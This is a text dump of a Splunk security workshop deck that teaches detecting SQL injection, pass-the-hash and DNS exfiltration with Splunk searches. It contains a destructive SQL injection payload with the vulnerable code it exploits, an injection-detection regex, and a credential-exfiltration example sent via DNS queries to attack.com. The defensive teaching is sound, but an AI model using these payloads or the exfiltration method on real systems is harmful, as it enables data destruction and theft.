SlideShare ist ein Scribd-Unternehmen logo
1 von 58
Downloaden Sie, um offline zu lesen
Copyright	©	2016	Splunk	Inc.
Splunk	Enterprise	for	
Information	Security	
Hands-On
Long	Beach	|	December	1,	2016
Presenters:	Beau	Morgan	&	Mark	Bonsack
2
Safe	Harbor	Statement
During	the	course	of	this	presentation,	we	may	make	forward-looking	statements	regarding	
future	events	or	the	expected	performance	of	the	company.	We	caution	you	that	such	
statements	reflect	our	current	expectations and estimates based	on	factors	currently	known	
to	us	and	that	actual	events	or	results	could	differ	materially.	For	important	factors	that	may	
cause	actual	results	to	differ	from	those	contained	in	our	forward-looking	statements,	please	
review	our	filings with	the	SEC. The	forward-looking	statements	made	in	this	presentation	
are	being	made	as	of	the	time	and	date	of	its	live	presentation. If reviewed	after its	live	
presentation, this	presentation	may	not	contain	current	or	accurate	information. We	do	not	
assume	any	obligation	to	update	any	forward-looking	statements	we may make. In	addition,	
any	information	about	our roadmap	outlines	our	general	product	direction	and	is	subject	to	
change	at	any	time	without	notice.	 It is	for	informational	purposes	only	and	shall	not be	
incorporated	into	any	contract	or	other	commitment.	 Splunk	undertakes	no	obligation	either	
to	develop	the	features	or	functionality	described or	to	include	any	such	feature	or	
functionality	in	a	future	release.
3
A-B – 01
C-D	– 02
E-F	– 03
G-H	– 04
I-K	– 05
L-M	– 06
N-P	– 07
Q-S	– 08
T-V	– 09
W-Z	– 10
https://od-sl-longbeach-sec-XX.splunkoxygen.com
Username:	splunklive Password:	security
Hands-On:	What’s	Your	First	Initial?
4
Agenda
Intro
Web	Attacks
Lateral	Movement
DNS	Exfiltration
Wrap-up	/	Q&A
Copyright	©	2016	Splunk	Inc.
Intro
Machine	data	contains	a	definitive	record	
of	all	interactions
Splunk	is	a	very	effective	platform	to	collect,	
store,	and	analyze	all	of	that	data
Human Machine
Machine Machine
Splunk	Solutions	>	Easy	to	Adopt
Across	Data	Sources,	Use	Cases	&	Consumption	Models
Platform	for	Operational	Intelligence
Rich	Ecosystem	of
Apps	&	Add-Ons
Splunk	Premium
Solutions
Mainframe
Data
Relational
Databases
MobileForwarders Syslog/TCP
IoT
Devices
Network
Wire	Data
Hadoop
Splunk	Positioned	as	a Leader	in	Gartner	2016	Magic	Quadrant	
for	Security	Information	and	Event	Management*
*Gartner,	Inc.,	2016	Magic	Quadrant	for	Security	Information	and	Event	Management,	and	Critical	Capabilities	for	Security	Information	and	Event	Management,	Oliver	Rochford,	Kelly	M.	Kavanagh,	Toby	Bussa.		10	August	2016	This	graphic	
was	published	by	Gartner,	Inc.	as	part	of	a	larger	research	document	and	should	be	evaluated	in	the	context	of	the	entire	document.	The	Gartner	document	is	available	upon	request	from	Splunk.		Gartner	does	not	endorse	any	vendor,	
product	or	service	depicted	in	its	research	publications,	and	does	not	advise	technology	users	to	select	only	those	vendors	with the	highest	ratings	or	other	designation.	Gartner	research	publications	consist	of	the	opinions	of	Gartner's	
research	organization	and	should	not	be	construed	as	statements	of	fact.	Gartner	disclaims	all	warranties,	expressed	or	implied, with	respect	to	this	research,	including	any	warranties	of	merchantability	or	fitness	for	a	particular	purpose.
Ø Four	years	in	a	row	as	a	leader
Ø Furthest	overall	in	
Completeness	of	Vision
Ø Splunk	also	scores	highest	in	
2016	Critical	Capabilities	for	
SIEM	report	in	all	three	use	cases
9
Gartner	Critical	Capabilities	for	SIEM
9
*Gartner,	Inc.,	2016	Magic	Quadrant	for	Security	Information	and	Event	Management,	and	Critical	Capabilities	for	Security	Information	and	Event	Management,	Oliver	Rochford,	Kelly	M.	Kavanagh,	Toby	Bussa.		10	August	2016	This	graphic	
was	published	by	Gartner,	Inc.	as	part	of	a	larger	research	document	and	should	be	evaluated	in	the	context	of	the	entire	document.	The	Gartner	document	is	available	upon	request	from	Splunk.		Gartner	does	not	endorse	any	vendor,	
product	or	service	depicted	in	its	research	publications,	and	does	not	advise	technology	users	to	select	only	those	vendors	with the	highest	ratings	or	other	designation.	Gartner	research	publications	consist	of	the	opinions	of	Gartner's	
research	organization	and	should	not	be	construed	as	statements	of	fact.	Gartner	disclaims	all	warranties,	expressed	or	implied, with	respect	to	this	research,	including	any	warranties	of	merchantability	or	fitness	for	a	particular	purpose.
1.	Basic	Security	Monitoring 2.	Advanced	Threat	Detection 3.	Forensics	&	Incident	Response
Copyright	©	2016	Splunk	Inc.
Web	Attacks
11
OWASP	2013	Top	10	
[10]	Unvalidated redirects	and	forwards
[9]	Using	components	with	known	vulnerabilities
[8]	Cross-site	request	forgery
[7]	Missing	function	level	access	control
[6]	Sensitive	data	exposure
[5]	Security	misconfiguration
[4]	Insecure	direct	object	reference
[3]	Cross-site	scripting	(XSS)
[2]	Broken	authentication	and	session	management
12
[1]	Injection
SQL	injection
Code	injection
OS	commanding
LDAP	injection
XML	injection
XPath injection
SSI	injection
IMAP/SMTP	injection
Buffer	overflow
Why	did	I	get	breached?
SQLi has	been	around	a	very,	
very	long	time	…
13
Source:	Imperva Web	Attacks	Report,	2015
14
TalkTalk:	PII/financial	data	for	4M	customers
VTech:	PII	for	5M	adults+kids
15
…and	so	far	this	year…	45
16
Little	Bobby	Tables
17
Why	Did	Bobby’s	School	Lose	Their	Records?
$sql = "INSERT INTO Students (Name)
VALUES ('" . $studentName . "');";
execute_sql($sql);
$studentName
1
2
18
INSERT INTO Students (Name)
VALUES ('John');
Why	Did	Bobby’s	School	Lose	Their	Records?
John
$studentName
19
Why	Did	Bobby’s	School	Lose	Their	Records?
Robert'); DROP TABLE Students;--
INSERT INTO Students (Name)
VALUES ('Robert'); DROP TABLE Students;--');
20
Speed	Camera	Ticket	Avoidance
Let’s	get	hands-on!
22
A-B – 01
C-D	– 02
E-F	– 03
G-H	– 04
I-K	– 05
L-M	– 06
N-P	– 07
Q-S	– 08
T-V	– 09
W-Z	– 10
https://od-sl-longbeach-sec-XX.splunkoxygen.com
Username:	splunklive Password:	security
Hands-On:	What’s	Your	First	Initial?
23
A	Little	About	Our	Environment
Our	learning	environment	consists	
of ~5.5M	events,	from	real	
environments,	but	sanitized:
• Windows	Security	events
• Apache	web	access	logs
• Bro	DNS	&	HTTP
• Palo	Alto	traffic	logs
• Some	other	various	bits
24
OR
Are	You	a	Newbie	or	Ninja?
Let’s	get	hands-on!
Web	Attacks
26
https://splunkbase.splunk.com/app/1528/
Search	for	possible	SQL	injection	in	your	events:
ü looks	for	patterns	in	URI	query	field	to	see	if	
anyone	has	injected	them	with	SQL	
statements
ü use	standard	deviations	that	are	2.5	times	
greater	than	the	average	length	of	your	URI	
query	field
Macros	used
• sqlinjection_pattern(sourcetype,	uri query	field)
• sqlinjection_stats(sourcetype,	uri query	field)
27
`sqlinjection_rex`	is	a	search	macro.	It	contains:
(?<injection>(?i)select.*?from|union.*?select|'$|delete.*?from|update.*?se
t|alter.*?table|([%27|'](%20)*=(%20)*[%27|'])|w*[%27|']or)
Which	means:	In	the	string	we	are	given,	look	for	ANY of	the	following	matches	
and	put	that	into	the	“injection”	field.	
Anything	containing	SELECT	followed	by	FROM
Anything	containing	UNION	followed	by	SELECT
Anything	with	a	‘	at	the	end
Anything	containing	DELETE	followed	by	FROM
Anything	containing	UPDATE	followed	by	SET
Anything	containing	ALTER	followed	by	TABLE
A	%27	OR	a	‘	and	then	a	%20	and	any	amount	of	characters	then	a	%20	and	then	a	%27	OR	a	‘
Note:	%27	is	encoded	“’”	and	%20	is	encoded	<space>
Any	amount	of	word	characters	followed	by	a	%27	OR	a	‘	and	then	“or”
Regular	Expressions	FTW
28
Bonus:	Try	out	the	SQL	Injection	Search app!
29
Summary:	Web	Attacks/SQL	Injection
SQL	injection	provide	attackers	with	easy	access	to	data
Detecting	advanced	SQL	injection	is	hard	– use	an	app!
Understand	where	SQLi is	happening	on	your	network	
and	put	a	stop	to	it
Augment	your	WAF	with	enterprise-wide	Splunk	
searches
Copyright	©	2016	Splunk	Inc.
Lateral	Movement
31
Poking	Around
An	attacker	hacks	a	non-privileged	user	system.	
So	what?
32
Lateral	Movement
Lateral	Movement	is	the	expansion	of	systems	
controlled,	and	data	accessed.
33
Most	Famous	Lateral	Movement	Attack?
(excluding	password	re-use)
Pass	the	Hash!
34
This	and	other	techniques	used	in	destructive	Sands breach…
…	and	at	Sony,	too.
35
Detecting	Legacy	PtH
Look	for	Windows	Events:
Event	ID:	4624	or	4625
Logon	type:	3
Auth package:	NTLM
User	account	is	not	a	domain	logon,	or	Anonymous	
Logon
…this	is	trivially	easy	in	Splunk
Let’s	get	hands-on!
Lateral	Movement:	Legacy
37
Then	It	Got	Harder
Pass	the	Hash	tools	have	improved	
Tracking	of	jitter,	other	metrics
So	let’s	detect	lateral	movement	differently
38
Network	Traffic	Provides	Source	of	Truth
I	usually	talk	to	10	hosts
Then	one	day	I	talk	to	10,000	hosts
ALARM!
Let’s	get	hands-on!
Lateral	Movement:	Network	Traffic
40
iz so	hard…	u	haz	magic?
41
iz	so	hard…	u	haz	magic?
Come	see…
at	the	demo	booths
UBA
42
Summary:	Lateral	Movement
Attacker	success	defines	scope	of	a	breach
High	difficulty,	high	importance
Worth	doing	in	Splunk
Easy	with	UBA
Copyright	©	2016	Splunk	Inc.
DNS	Exfiltration
44
domain=corp;user=dave;password=12345
encrypt
DNS	Query:
ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com
ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==
45
DNS	exfil tends	to	be	
overlooked	within	an	
ocean	of	DNS	data.
Let’s	fix	that!
DNS	Exfiltration
46
FrameworkPOS:	a	card-stealing	program	that	exfiltrates data	from	the	
target’s	network	by	transmitting	it	as	domain	name	system	(DNS)	traffic
But	the	big	difference	is	the	way	how	stolen	data	is	
exfiltrated:	the	malware	used	DNS	requests!	
https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-
variant-exfiltrates-data-via-dns-requests
“
”
…	few	organizations	actually	keep	detailed	logs	or	records	
of the	DNS	traffic	traversing	their	networks	— making	it	an	
ideal	way	to	siphon	data	from	a	hacked	network.	
http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-
beauty-breach/#more-30872
“
”
DNS	Exfiltration
47
https://splunkbase.splunk.com/app/2734/
DNS	exfil detection	– tricks	of	the	trade
ü parse	URLs	&	complicated	TLDs	(Top	Level	Domain)
ü calculate	Shannon	Entropy
List	of	provided	lookups
• ut_parse_simple(url)
• ut_parse(url,	list)	or	ut_parse_extended(url,	list)	
• ut_shannon(word)
• ut_countset(word,	set)
• ut_suites(word,	sets)
• ut_meaning(word)
• ut_bayesian(word)
• ut_levenshtein(word1,	word2)
48
Examples
• The	domain	aaaaa.com has	a	Shannon	Entropy	score	of	1.8 (very	low)
• The	domain	google.com has	a	Shannon	Entropy	score	of	2.6 (rather	low)
• A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com has	a	Shannon	
Entropy	score	of	3 (rather	high)
Layman’s	definition:	a	score	reflecting	the	randomness or	measure	of	
uncertainty of	a	string
Shannon	Entropy
49
Detecting	Data	Exfiltration
index=bro	sourcetype=bro_dns
|	`ut_parse(query)`	
|	`ut_shannon(ut_subdomain)`	
|	eval sublen =	
length(ut_subdomain)
|	table	ut_domain ut_subdomain
ut_shannon sublen
TIPS
q Leverage	our	Bro	DNS	data
q Calculate	Shannon	Entropy	scores
q Calculate	subdomain	length
q Display	Details
Let’s	get	hands-on!
Lateral	Movement:	DNS	Exfiltration
51
Detecting	Data	Exfiltration
…	|	stats	
count	
avg(ut_shannon)	as	avg_sha
avg(sublen)	as	avg_sublen
stdev(sublen)	as	stdev_sublen
by	ut_domain
|	search	avg_sha>3	avg_sublen>20	
stdev_sublen<2
TIPS
q Leverage	our	Bro	DNS	data
q Calculate	Shannon	Entropy	scores
q Calculate	subdomain	length
q Display	count,	scores,	lengths,	
deviations
52
Detecting	Data	Exfiltration
RESULTS
• Exfiltrating data	requires	many	DNS	requests	– look	for	high	counts
• DNS	exfiltration	to	mooo.com and chickenkiller.com
53
Summary:	DNS	Exfiltration
Exfiltration	by	DNS	and	ICMP	is	a	very	
common	technique
Many	organizations	do	not	analyze	DNS	
activity	– do	not	be	like	them!
No	DNS	logs?	No	Splunk Stream?	Look	at	FW	
byte	counts
Copyright	©	2016	Splunk	Inc.
Wrap-up	/	Q&A
55
Summary
Multiple	phases	to	modern	attacks
Deploy	detection	across	all	phases
Also	consider	adaptive	response!
Stay	abreast	of	modern	advancements
Today’s	content	(PDF):
https://splunk.box.com/v/SplunkLive-Security-Handout
56
Analytics	Driven	Security
https://www.splunk.com/en_us/solutions/solution-areas/security-and-fraud/security-investigation.html
• 5,000+	IT	and	Business	Professionals
• 175+	Sessions	
• 80+	Customer	Speakers
PLUS	Splunk University
• Three	days:	Sept	23-25,	2017
• Get	Splunk Certified	for	FREE!
• Get	CPE	credits	for	CISSP,	CAP,	SSCP
SEPT	25-28,	2017
Walter	E.	Washington	Convention	Center
Washington,	D.C.
CONF.SPLUNK.COM
The	8th Annual	Splunk	Worldwide	Users’	Conference
Thank	You

Weitere ähnliche Inhalte

Was ist angesagt?

SplunkLive DC April 2016 - Operationalizing Machine Learning
SplunkLive DC April 2016 - Operationalizing Machine LearningSplunkLive DC April 2016 - Operationalizing Machine Learning
SplunkLive DC April 2016 - Operationalizing Machine Learning
Tom LaGatta
 

Was ist angesagt? (17)

Accelerate Troubleshooting and Reinvent Monitoring with Interactive Visualiza...
Accelerate Troubleshooting and Reinvent Monitoring with Interactive Visualiza...Accelerate Troubleshooting and Reinvent Monitoring with Interactive Visualiza...
Accelerate Troubleshooting and Reinvent Monitoring with Interactive Visualiza...
 
Webinar: Splunk Enterprise Security Deep Dive: Analytics
Webinar: Splunk Enterprise Security Deep Dive: AnalyticsWebinar: Splunk Enterprise Security Deep Dive: Analytics
Webinar: Splunk Enterprise Security Deep Dive: Analytics
 
Machine Learning + Analytics
Machine Learning + AnalyticsMachine Learning + Analytics
Machine Learning + Analytics
 
Machine Learning + Analytics in Splunk
Machine Learning + Analytics in SplunkMachine Learning + Analytics in Splunk
Machine Learning + Analytics in Splunk
 
5 Ways to Improve your Security Posture with Splunk Enterprise Security
5 Ways to Improve your Security Posture with Splunk Enterprise Security5 Ways to Improve your Security Posture with Splunk Enterprise Security
5 Ways to Improve your Security Posture with Splunk Enterprise Security
 
SplunkLive Melbourne Splunk for Operational Security Intelligence
SplunkLive Melbourne Splunk for Operational Security Intelligence SplunkLive Melbourne Splunk for Operational Security Intelligence
SplunkLive Melbourne Splunk for Operational Security Intelligence
 
SplunkLive Sydney Enterprise Security & User Behavior Analytics
SplunkLive Sydney Enterprise Security & User Behavior AnalyticsSplunkLive Sydney Enterprise Security & User Behavior Analytics
SplunkLive Sydney Enterprise Security & User Behavior Analytics
 
SplunkLive Canberra Enterprise Security & User Behavior Analytics
SplunkLive Canberra Enterprise Security & User Behavior AnalyticsSplunkLive Canberra Enterprise Security & User Behavior Analytics
SplunkLive Canberra Enterprise Security & User Behavior Analytics
 
Getting Started with Splunk Hands-on
Getting Started with Splunk Hands-onGetting Started with Splunk Hands-on
Getting Started with Splunk Hands-on
 
SplunkLive Perth Enterprise Security & User Behavior Analytics
SplunkLive Perth Enterprise Security & User Behavior AnalyticsSplunkLive Perth Enterprise Security & User Behavior Analytics
SplunkLive Perth Enterprise Security & User Behavior Analytics
 
Splunk Webinar: Mit Splunk SPL Maschinendaten durchsuchen, transformieren und...
Splunk Webinar: Mit Splunk SPL Maschinendaten durchsuchen, transformieren und...Splunk Webinar: Mit Splunk SPL Maschinendaten durchsuchen, transformieren und...
Splunk Webinar: Mit Splunk SPL Maschinendaten durchsuchen, transformieren und...
 
SplunkLive DC April 2016 - Operationalizing Machine Learning
SplunkLive DC April 2016 - Operationalizing Machine LearningSplunkLive DC April 2016 - Operationalizing Machine Learning
SplunkLive DC April 2016 - Operationalizing Machine Learning
 
SplunkLive Brisbane Splunk for Operational Security Intelligence
SplunkLive Brisbane Splunk for Operational Security IntelligenceSplunkLive Brisbane Splunk for Operational Security Intelligence
SplunkLive Brisbane Splunk for Operational Security Intelligence
 
SplunkLive Melbourne Machine Learning & Analytics
SplunkLive Melbourne Machine Learning & AnalyticsSplunkLive Melbourne Machine Learning & Analytics
SplunkLive Melbourne Machine Learning & Analytics
 
SplunkLive Canberra Machine Learning & Analytics
SplunkLive Canberra Machine Learning & AnalyticsSplunkLive Canberra Machine Learning & Analytics
SplunkLive Canberra Machine Learning & Analytics
 
SplunkLive Perth Machine Learning & Analytics
SplunkLive Perth Machine Learning & AnalyticsSplunkLive Perth Machine Learning & Analytics
SplunkLive Perth Machine Learning & Analytics
 
SplunkLive Melbourne Enterprise Security & User Behavior Analytics
SplunkLive Melbourne Enterprise Security & User Behavior AnalyticsSplunkLive Melbourne Enterprise Security & User Behavior Analytics
SplunkLive Melbourne Enterprise Security & User Behavior Analytics
 

Andere mochten auch

Andere mochten auch (20)

Bechtel Customer Presentation
Bechtel Customer PresentationBechtel Customer Presentation
Bechtel Customer Presentation
 
Splunk .conf2011: Splunk for Fraud and Forensics at Intuit
Splunk .conf2011: Splunk for Fraud and Forensics at IntuitSplunk .conf2011: Splunk for Fraud and Forensics at Intuit
Splunk .conf2011: Splunk for Fraud and Forensics at Intuit
 
Power of Splunk Search Processing Language (SPL) ...
Power of Splunk Search Processing Language (SPL)                             ...Power of Splunk Search Processing Language (SPL)                             ...
Power of Splunk Search Processing Language (SPL) ...
 
Herbalife Customer Presentation
Herbalife Customer PresentationHerbalife Customer Presentation
Herbalife Customer Presentation
 
Splunk for Security-Hands On
Splunk for Security-Hands OnSplunk for Security-Hands On
Splunk for Security-Hands On
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Building a Security Information and Event Management platform at Travis Per...
 	Building a Security Information and Event Management platform at Travis Per... 	Building a Security Information and Event Management platform at Travis Per...
Building a Security Information and Event Management platform at Travis Per...
 
Splunk Enterprise for Information Security Hands-On Breakout Session
Splunk Enterprise for Information Security Hands-On Breakout SessionSplunk Enterprise for Information Security Hands-On Breakout Session
Splunk Enterprise for Information Security Hands-On Breakout Session
 
SplunkLive! Warsaw 2016 - Getting started with Splunk
SplunkLive! Warsaw 2016 - Getting started with SplunkSplunkLive! Warsaw 2016 - Getting started with Splunk
SplunkLive! Warsaw 2016 - Getting started with Splunk
 
Bechtel Customer Presentation
Bechtel Customer PresentationBechtel Customer Presentation
Bechtel Customer Presentation
 
Power of SPL
Power of SPLPower of SPL
Power of SPL
 
Hands-On Security Breakout Session- ES Guided Tour
Hands-On Security Breakout Session- ES Guided TourHands-On Security Breakout Session- ES Guided Tour
Hands-On Security Breakout Session- ES Guided Tour
 
Splunk for Developers
Splunk for DevelopersSplunk for Developers
Splunk for Developers
 
Splunk for Enterprise Security featuring UBA
Splunk for Enterprise Security featuring UBA Splunk for Enterprise Security featuring UBA
Splunk for Enterprise Security featuring UBA
 
Splunk Enterprise for InfoSec Hands-On
Splunk Enterprise for InfoSec Hands-OnSplunk Enterprise for InfoSec Hands-On
Splunk Enterprise for InfoSec Hands-On
 
Splunk Fundamentals: Investigations with Core Splunk - Splunk Tech Day
Splunk Fundamentals: Investigations with Core Splunk - Splunk Tech DaySplunk Fundamentals: Investigations with Core Splunk - Splunk Tech Day
Splunk Fundamentals: Investigations with Core Splunk - Splunk Tech Day
 
Splunk Ninjas: New Features, Pivot, and Search Dojo
Splunk Ninjas: New Features, Pivot, and Search DojoSplunk Ninjas: New Features, Pivot, and Search Dojo
Splunk Ninjas: New Features, Pivot, and Search Dojo
 
Splunk for Security - Hands-On
Splunk for Security - Hands-On Splunk for Security - Hands-On
Splunk for Security - Hands-On
 
Splunk conf2014 - Detecting Fraud and Suspicious Events Using Risk Scoring
Splunk conf2014 - Detecting Fraud and Suspicious Events Using Risk ScoringSplunk conf2014 - Detecting Fraud and Suspicious Events Using Risk Scoring
Splunk conf2014 - Detecting Fraud and Suspicious Events Using Risk Scoring
 
Splunk Dashboarding & Universal Vs. Heavy Forwarders
Splunk Dashboarding & Universal Vs. Heavy ForwardersSplunk Dashboarding & Universal Vs. Heavy Forwarders
Splunk Dashboarding & Universal Vs. Heavy Forwarders
 

Ähnlich wie Splunk Enterprise for InfoSec Hands-On

Ähnlich wie Splunk Enterprise for InfoSec Hands-On (17)

Deception-Triggered Security Data Science to Detect Adversary Movements
Deception-Triggered Security Data Science to Detect Adversary MovementsDeception-Triggered Security Data Science to Detect Adversary Movements
Deception-Triggered Security Data Science to Detect Adversary Movements
 
SplunkLive Melbourne Machine Learning & Analytics
SplunkLive Melbourne Machine Learning & AnalyticsSplunkLive Melbourne Machine Learning & Analytics
SplunkLive Melbourne Machine Learning & Analytics
 
SplunkLive Perth Machine Learning & Analytics
SplunkLive Perth Machine Learning & AnalyticsSplunkLive Perth Machine Learning & Analytics
SplunkLive Perth Machine Learning & Analytics
 
SplunkLive Sydney Machine Learning & Analytics
SplunkLive Sydney Machine Learning & AnalyticsSplunkLive Sydney Machine Learning & Analytics
SplunkLive Sydney Machine Learning & Analytics
 
SplunkLive Canberra Machine Learning & Analytics
SplunkLive Canberra Machine Learning & AnalyticsSplunkLive Canberra Machine Learning & Analytics
SplunkLive Canberra Machine Learning & Analytics
 
SplunkLive Sydney Machine Learning & Analytics
SplunkLive Sydney Machine Learning & AnalyticsSplunkLive Sydney Machine Learning & Analytics
SplunkLive Sydney Machine Learning & Analytics
 
SplunkLive Melbourne Enterprise Security & User Behaviour Analytics
SplunkLive Melbourne Enterprise Security & User Behaviour Analytics SplunkLive Melbourne Enterprise Security & User Behaviour Analytics
SplunkLive Melbourne Enterprise Security & User Behaviour Analytics
 
Getting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseGetting Started with Splunk Enterprise
Getting Started with Splunk Enterprise
 
SplunkLive Brisbane Splunk for Operational Security Intelligence
SplunkLive Brisbane Splunk for Operational Security IntelligenceSplunkLive Brisbane Splunk for Operational Security Intelligence
SplunkLive Brisbane Splunk for Operational Security Intelligence
 
SplunkLive Brisbane Splunking the Endpoint
SplunkLive Brisbane Splunking the EndpointSplunkLive Brisbane Splunking the Endpoint
SplunkLive Brisbane Splunking the Endpoint
 
SplunkLive Canberra Enterprise Security and User Behaviour Analytics
SplunkLive Canberra Enterprise Security and User Behaviour AnalyticsSplunkLive Canberra Enterprise Security and User Behaviour Analytics
SplunkLive Canberra Enterprise Security and User Behaviour Analytics
 
SplunkLive Perth Enterprise Security & User Behaviour Analytics
SplunkLive Perth Enterprise Security & User Behaviour AnalyticsSplunkLive Perth Enterprise Security & User Behaviour Analytics
SplunkLive Perth Enterprise Security & User Behaviour Analytics
 
Splunk Webinar: Verwandeln Sie Daten in wertvolle Erkenntnisse - Machine Lear...
Splunk Webinar: Verwandeln Sie Daten in wertvolle Erkenntnisse - Machine Lear...Splunk Webinar: Verwandeln Sie Daten in wertvolle Erkenntnisse - Machine Lear...
Splunk Webinar: Verwandeln Sie Daten in wertvolle Erkenntnisse - Machine Lear...
 
SplunkLive Sydney Enterprise Security & User Behaviour Analytics
SplunkLive Sydney Enterprise Security & User Behaviour AnalyticsSplunkLive Sydney Enterprise Security & User Behaviour Analytics
SplunkLive Sydney Enterprise Security & User Behaviour Analytics
 
Getting Started with Splunk Enterprise
Getting Started with Splunk Enterprise Getting Started with Splunk Enterprise
Getting Started with Splunk Enterprise
 
Getting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseGetting Started with Splunk Enterprise
Getting Started with Splunk Enterprise
 
Getting Started with Splunk Hands-on
Getting Started with Splunk Hands-onGetting Started with Splunk Hands-on
Getting Started with Splunk Hands-on
 

Mehr von Splunk

Mehr von Splunk (20)

.conf Go 2023 - Data analysis as a routine
.conf Go 2023 - Data analysis as a routine.conf Go 2023 - Data analysis as a routine
.conf Go 2023 - Data analysis as a routine
 
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
 
.conf Go 2023 - Navegando la normativa SOX (Telefónica)
.conf Go 2023 - Navegando la normativa SOX (Telefónica).conf Go 2023 - Navegando la normativa SOX (Telefónica)
.conf Go 2023 - Navegando la normativa SOX (Telefónica)
 
.conf Go 2023 - Raiffeisen Bank International
.conf Go 2023 - Raiffeisen Bank International.conf Go 2023 - Raiffeisen Bank International
.conf Go 2023 - Raiffeisen Bank International
 
.conf Go 2023 - På liv og død Om sikkerhetsarbeid i Norsk helsenett
.conf Go 2023 - På liv og død Om sikkerhetsarbeid i Norsk helsenett .conf Go 2023 - På liv og død Om sikkerhetsarbeid i Norsk helsenett
.conf Go 2023 - På liv og død Om sikkerhetsarbeid i Norsk helsenett
 
.conf Go 2023 - Many roads lead to Rome - this was our journey (Julius Bär)
.conf Go 2023 - Many roads lead to Rome - this was our journey (Julius Bär).conf Go 2023 - Many roads lead to Rome - this was our journey (Julius Bär)
.conf Go 2023 - Many roads lead to Rome - this was our journey (Julius Bär)
 
.conf Go 2023 - Das passende Rezept für die digitale (Security) Revolution zu...
.conf Go 2023 - Das passende Rezept für die digitale (Security) Revolution zu....conf Go 2023 - Das passende Rezept für die digitale (Security) Revolution zu...
.conf Go 2023 - Das passende Rezept für die digitale (Security) Revolution zu...
 
.conf go 2023 - Cyber Resilienz – Herausforderungen und Ansatz für Energiever...
.conf go 2023 - Cyber Resilienz – Herausforderungen und Ansatz für Energiever....conf go 2023 - Cyber Resilienz – Herausforderungen und Ansatz für Energiever...
.conf go 2023 - Cyber Resilienz – Herausforderungen und Ansatz für Energiever...
 
.conf go 2023 - De NOC a CSIRT (Cellnex)
.conf go 2023 - De NOC a CSIRT (Cellnex).conf go 2023 - De NOC a CSIRT (Cellnex)
.conf go 2023 - De NOC a CSIRT (Cellnex)
 
conf go 2023 - El camino hacia la ciberseguridad (ABANCA)
conf go 2023 - El camino hacia la ciberseguridad (ABANCA)conf go 2023 - El camino hacia la ciberseguridad (ABANCA)
conf go 2023 - El camino hacia la ciberseguridad (ABANCA)
 
Splunk - BMW connects business and IT with data driven operations SRE and O11y
Splunk - BMW connects business and IT with data driven operations SRE and O11ySplunk - BMW connects business and IT with data driven operations SRE and O11y
Splunk - BMW connects business and IT with data driven operations SRE and O11y
 
Splunk x Freenet - .conf Go Köln
Splunk x Freenet - .conf Go KölnSplunk x Freenet - .conf Go Köln
Splunk x Freenet - .conf Go Köln
 
Splunk Security Session - .conf Go Köln
Splunk Security Session - .conf Go KölnSplunk Security Session - .conf Go Köln
Splunk Security Session - .conf Go Köln
 
Data foundations building success, at city scale – Imperial College London
 Data foundations building success, at city scale – Imperial College London Data foundations building success, at city scale – Imperial College London
Data foundations building success, at city scale – Imperial College London
 
Splunk: How Vodafone established Operational Analytics in a Hybrid Environmen...
Splunk: How Vodafone established Operational Analytics in a Hybrid Environmen...Splunk: How Vodafone established Operational Analytics in a Hybrid Environmen...
Splunk: How Vodafone established Operational Analytics in a Hybrid Environmen...
 
SOC, Amore Mio! | Security Webinar
SOC, Amore Mio! | Security WebinarSOC, Amore Mio! | Security Webinar
SOC, Amore Mio! | Security Webinar
 
.conf Go 2022 - Observability Session
.conf Go 2022 - Observability Session.conf Go 2022 - Observability Session
.conf Go 2022 - Observability Session
 
.conf Go Zurich 2022 - Keynote
.conf Go Zurich 2022 - Keynote.conf Go Zurich 2022 - Keynote
.conf Go Zurich 2022 - Keynote
 
.conf Go Zurich 2022 - Platform Session
.conf Go Zurich 2022 - Platform Session.conf Go Zurich 2022 - Platform Session
.conf Go Zurich 2022 - Platform Session
 
.conf Go Zurich 2022 - Security Session
.conf Go Zurich 2022 - Security Session.conf Go Zurich 2022 - Security Session
.conf Go Zurich 2022 - Security Session
 

Kürzlich hochgeladen

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 

Kürzlich hochgeladen (20)

A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
